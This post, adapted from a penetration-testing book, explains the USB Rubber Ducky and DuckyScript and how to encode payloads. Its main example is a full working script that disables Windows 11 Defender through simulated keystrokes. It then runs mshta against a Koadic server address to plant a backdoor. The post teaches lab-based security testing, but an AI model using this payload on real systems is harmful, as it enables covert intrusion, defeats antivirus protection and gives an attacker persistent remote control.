What Is?

What Is USB Rubber Ducky?

With its USB Rubber Ducky, the Hak5 company created a quasi-standard for USB attacks of all kinds.

 

For this purpose, the company developed a simple scripting language and published a series of payloads on its website (https://github.com/hak5/usbrubberducky-payloads).

 

Meanwhile, the Ducky can be used with all operating systems. Primarily developed for administrators and penetration testers, the tool resembles a conventional USB flash drive from the outside. Due to the way it works, it could be called a programmable keyboard.

 

Structure and Functionality

The USB Rubber Ducky consists of an Atmel 60 MHz 32-bit processor, a JTAG interface for I/O operations, and a microSD card reader (see figure below). It can be used with the conventional USB 2.0 port on almost all devices and emulates a keyboard in the process. In addition, the USB Rubber Ducky is equipped with a push button and LED.

 

USB Rubber Ducky with microSD Card

 

The device is thus designed exclusively for keystroke injection attacks and quickly excited the imagination of penetration testers and developers. After all, the simple script language contributed to the success with which payloads can be created in just a few minutes. It’s therefore not surprising that the open-source community has already created many scripts and sample applications that only need to be adapted to your own conditions.

 

DuckyScript

The Rubber Ducky is programmed in the DuckyScript language. The following list summarizes the most important elements of the language and demonstrates their use with simple examples:

REM

REM marks comments.

WINDOWS or GUI

These two commands simulate pressing the Windows key, the (Cmd) key on macOS, or the “super key” on Linux. You can pass a single character or a string as a parameter:

 

REM Call Spotlight search in macOS

GUI SPACE

 

REM Open Run dialog in Windows

WINDOWS r

 

REM Open Windows settings

WINDOWS i

 

REM Open Windows context menu of the Start menu

WINDOWS X

DELAY

DELAY allows you to force a pause until the next command execution. This is recommended to give the target system time to process a command. You specify the time in milliseconds.

 

Alternatively, you can use f or DEFAULTDELAY to create a delay between each command in the script. This must be declared at the beginning of the script:

 

REM Wait 5 seconds to load file

DELAY 5000

 

REM Always wait 200 ms until next command

DEFAULT_DELAY 200

STRING

STRING simulates the keyboard input of a string in the system:

 

REM Start macOS spotlight search

GUI SPACE

REM Open settings for internet accounts

STRING Internet accounts

 

REM Open Windows command prompt window

WINDOWS

STRING cmd.exe

ENTER

MENU or APP

These two commands simulate pressing the menu or application key on Windows. Alternatively, the (Shift)+(F10) combination would also be possible here:

 

REM Open Wordpad and paste text from clipboard

GUI r

STRING wordpad

ENTER

MENU

STRING E

SHIFT, ALT, and CTRL or CONTROL

These commands simulate the corresponding control keys. They are often used in combination with other keys. For example, DuckyScript allows the following combinations:

 

– SHIFT with DELETE, HOME, INSERT, PAGEUP, PAGEDOWN, WINDOWS, GUI, UPARROW, DOWNARROW, LEFTARROW, RIGHTARROW, TAB

– ALT with END, ESC, ESCAPE, F1 to F12, SPACE, TAB, or with a single letter or character

– CTRL with BREAK, PAUSE, F1 to F12, ESCAPE, ESC, or with a single character

 

For example:

 

REM Exit active application

ALT F4

 

REM Open Windows Task Manager

CTRL SHIFT ESC

REM Open Linux terminal on Ubuntu

CTRL ALT T

 

REM Run Mission Control in macOS

ALT F3

REPEAT

REPEAT repeats the previous command n times:

 

REM Arrow key 5 times to the right and then 3 times

REM down; press Enter

RIGHT

REPEAT 4

DOWN

REPEAT 2

ENTER

Additional Commands

Depending on the operating system and the keyboard driver used, additional commands may be used whose meaning largely corresponds to the designations on the keyboard. These include BREAK or PAUSE, CAPSLOCK, DELETE, ESC or ESCAPE, HOME, INSERT, NUMLOCK, PAGEUP, PAGEDOWN, PRINTSCREEN, SCROLLLOCK, SPACE, and TAB.

 

Installing a Backdoor on Windows 11

As mentioned, there are a large number of ready-made scripts that you just need to customize. To help you create your first DuckyScript, we’ve devised the following scenario that will allow you to bypass Windows 11 antivirus protection (Windows Defender) and then install a backdoor on the PC. In addition to operating systems, Microsoft is also constantly developing virus and threat protection. The attackers’ goal is therefore to disable or at least bypass this functionality—for example, with the help of PowerShell. This is now no longer so easily possible in the latest versions of Windows 10 and 11.

 

Although Microsoft was able to increase security in this case, the user still has the option to manually disable virus and threat protection for a certain period of time. We can take advantage of this by using the USB Rubber Ducky to simulate a user’s keystrokes for this operation. This allows us to later install a backdoor on the PC that ensures a permanent connection to the attacker.

 

For this particular case, we use Microsoft HTML Application Host, software that’s already on the Windows PC. We transfer the necessary HTA file with a simple command from the Koadic server. This attack technique, also called living off the land (LotL), is increasingly seen in cyberattacks. The goal here is to use trusted standard and system tools of operating systems for malicious purposes.

 

A script is stored on the Rubber Ducky, which you can edit using your favorite editor. In the following listing, the lines are numbered so that we can better explain the functions of the code. Do not include the numbers yourself! Now let’s look at the code:

 

1 REM Turn off Windows 11 Defender (Version 21H2)

2 REM Install Koadic-Backdoor

3 REM Author: Frank Neugebauer, Pentetstit.de

5 REM You take responsibility for any laws you break with this,

      I simply point out the security flaw

6 REM Let the HID enumerate

7 DEFAULT_DELAY 500

8 DELAY 2000

9 ESCAPE

10 CONTROL ESCAPE

11 STRING Windows security

12 ENTER

13 ENTER

14 TAB

15 TAB

16 TAB

17 TAB

18 ENTER

19 SPACE

20 CTRL-ALT TAB

21 ENTER

22 TAB

23 TAB

24 ENTER

25 TAB

26 SPACE

27 ALT F4

28 REM Install Koadic Backdoor

29 GUI r

30 STRING mshta http://192.168.171.110:9001/test123

31 ENTER

 

The command listed in line 7 allows you to “slow down” the Rubber Ducky a bit and give the target system some time to respond to the individual commands. If 500 ms isn’t sufficient, you can also enter a higher value.

 

The STRING command in line 11 helps you to quickly find the virus and threat protection settings in Windows 11. The subsequent commands simulate the user’s keystrokes to disable this functionality.

 

In lines 29 to 31, you establish the backdoor to the Windows PC. For this purpose, the URL http://192.168.171.110:9001/test123 is called on the target system using the mshta.exe file.

 

Stealing Passwords with the Rubber Ducky

 

To be able to recreate the attack under laboratory conditions, we placed the attacker and the target system in the same subnet. However, the attack could also take place across network boundaries under real conditions.

 

The figure below shows that the PC with IP address 192.168.171.111 has established a zombie connection to the Koadic server. In this case, we should forgive Koadic for not recognizing the Windows version correctly. Nevertheless, all Koadic modules can be used in the upcoming postexploitation phase of penetration testing.

 

The Windows 11 PC Has Established a Zombie Connection to the Koadic Server

 

Use With Duck Encoder to Create the Finished Payload

If you think you can immediately use the script created in the previous section, we’re sorry to disappoint you. To use the DuckyScript script on the microSD card, it must first be encoded. For this purpose, the developers have provided the Duck Encoder, based on Java (http://s-prs.co/v569665).

 

A summary of the syntax of this program is provided by the following command:

 

java -jar duckencoder.jar -h

 

Basically, you need to pass three parameters. In addition to the input and output files, the desired keyboard layout can also be set here.

 

If you use a Linux system based on Ubuntu, you can immediately proceed with encoding the sample script. To do this, you need to run the following command:

 

java -jar duckencoder.jar -l us -i ducky_code.txt -o inject.bin

 

With this, you’ve selected a US keyboard layout, the sample script ducky_code.txt as the input file, and inject.bin as the output file.

 

You can also assign a different name to the output file. But it’s important that the file used later on the USB Rubber Ducky has this name.

 

If you’re not afraid to code your script over the internet, you can use an online variant of the Duck Encoder. The Duck Toolkit site at https://ducktoolkit.com provides a payload generator in addition to an online encoder (see figure below). Here you can select ready-made scripts for Linux and Windows in different categories.

 

Duck Toolkit as Online Variant of the Duck Encoder

 

Once the script has been encoded, it can be copied to the microSD card using the included card reader. Of course, you can keep multiple files there depending on the storage capacity. However, only the payload named inject.bin is executed; it must be located in the root directory.

 

Editor’s note: This post has been adapted from a section of the book Hacking and Security:

The Comprehensive Guide to Penetration Testing and Cybersecurity by Michael Kofler, Klaus Gebeshuber, Peter Kloep, Frank Neugebauer, André Zingsheim, Thomas Hackner, Markus Widl, Roland Aigner, Stefan Kania, Tobias Scheible, and Matthias Wübbeling.

Recommendation

Hacking and Security
Hacking and Security

Uncover security vulnerabilities and harden your system against attacks! With this guide you’ll learn to set up a virtual learning environment where you can test out hacking tools, from Kali Linux to hydra and Wireshark. Then expand your understanding of offline hacking, external safety checks, penetration testing in networks, and other essential security techniques, with step-by-step instructions. With information on mobile, cloud, and IoT security you can fortify your system against any threat!

Learn More
Rheinwerk Computing
by Rheinwerk Computing

Rheinwerk Computing is an imprint of Rheinwerk Publishing and publishes books by leading experts in the fields of programming, administration, security, analytics, and more.

Comments